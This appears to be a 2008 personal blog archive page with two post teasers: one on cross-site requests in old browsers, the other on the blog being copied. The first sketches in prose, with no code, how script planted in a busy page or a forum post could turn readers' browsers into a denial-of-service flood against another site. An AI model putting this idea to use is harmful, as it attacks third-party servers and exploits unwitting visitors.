Month: October 2008

Cross Site Scripting (XSS) and Denial of Service (DoS) using AJAX and other Technologies

The other day I was wondering how Google Analytics works... You put a few lines of Javascript into your page and it loads another script to send data back to one of its servers. I assumed they used an AJAX XMLHttpRequest to send stats to their server. However, an XMLHttpRequest created in Javascript (or any script language for that matter) can only make calls back to the server where the browser made the original request, not where it loaded the script. So if for example a site abc.com has a page which loads a script from def.com, the script can create an XMLHttpRequest object but it can ONLY make calls to abc.com. Hmmm... that's not entirely true. With IE 6.0.2900 and probably earlier versions of Firefox / other browsers it was possible to make the XMLHttpRequest object call any server, which would be great for a Denial of Service (DoS) attack. Imagine you have a site with millions of page views a day? And your'e feeling unfriendly and want to create a DoS attack against your foe. Easy, you put some script in a page which is frequently viewed, and unknowingly, every one of your readers viewing that page makes a call to your foe's website, stretching its abilities to relpy to all requests, resulting in the DoS attack, which might even take down the server... Or even worse, an unfriendly user of yours posts some content to a forum containing a script to perform that DoS on their own…

Read more

Blog Piracy…

The internet never ceases to amaze me... For it appears someone at ease with a cyrillic language is copying my blog word for word:     http://rational_software_architect.softblog.biz/category/work/page/2/ I guess I shall take it as a compliment. I also guess they are just an RSS subscriber and their blog gets updated automatically, so perhaps all of my future postings will have copyright notices in them :-( So, this posting is Copyright 2008, Ant Kutschera! UPDATE: Excellent - I see the site has been taken down! I wonder if its because of the email I sent to their provider, or because they just got bored? Probably the latter :-( If you notice that the site is ever up again, please post a comment below to inform me. Thanks!

Read more